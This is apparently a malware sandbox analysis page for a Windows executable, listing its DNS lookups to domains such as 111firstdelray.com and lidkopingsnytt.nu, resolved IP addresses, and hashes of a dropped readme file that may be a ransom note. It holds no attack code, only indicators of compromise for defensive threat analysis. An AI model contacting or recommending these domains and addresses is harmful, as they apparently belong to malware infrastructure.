        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        128 B
         80 B
         2
        1

        DNS Request

        111firstdelray.com

        DNS Request

        111firstdelray.com

        DNS Response

        146.148.139.87

      • 8.8.8.8:53
        18.173.189.20.in-addr.arpa
        dns
        144 B
         158 B
         2
        1

        DNS Request

        18.173.189.20.in-addr.arpa

        DNS Request

        18.173.189.20.in-addr.arpa

      • 8.8.8.8:53
        lidkopingsnytt.nu
        dns
        d0190f94e6d05104977c53b55dbc2911_JaffaCakes118.exe
        252 B
         79 B
         4
        1

        DNS Request

        lidkopingsnytt.nu

        DNS Request

        lidkopingsnytt.nu

        DNS Request

        lidkopingsnytt.nu

        DNS Request

        lidkopingsnytt.nu

        DNS Response

        185.189.49.45

      • 8.8.8.8:53
        45.49.189.185.in-addr.arpa
        dns
        360 B
         5

        DNS Request

        45.49.189.185.in-addr.arpa

        DNS Request

        45.49.189.185.in-addr.arpa

        DNS Request

        45.49.189.185.in-addr.arpa

        DNS Request

        45.49.189.185.in-addr.arpa

        DNS Request

        45.49.189.185.in-addr.arpa

      • 8.8.8.8:53
        18.173.189.20.in-addr.arpa
        dns
        72 B
         158 B
         1
        1

        DNS Request

        18.173.189.20.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\7m7n045-readme.txt
        Filesize

        6KB

        MD5

        e2b0be8292e176f123e908d509a600f9

        SHA1

        8e726f8a76e54a409c15a9d0d6ede1fede442e52

        SHA256

        e5d0b044e0504848674acf2484fa90744a52b6d3f528eeb532853bd5bc31a8e7

        SHA512

        3fc8da1f1c2d929814de0ee9a2e08ccd6e8d5a54c81bba2ea67e57c69e09305e8d155470cd6605ca2def7522810ed3cb7d1ce0662d2829c91ce18b6915745da6

        Download Submit

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.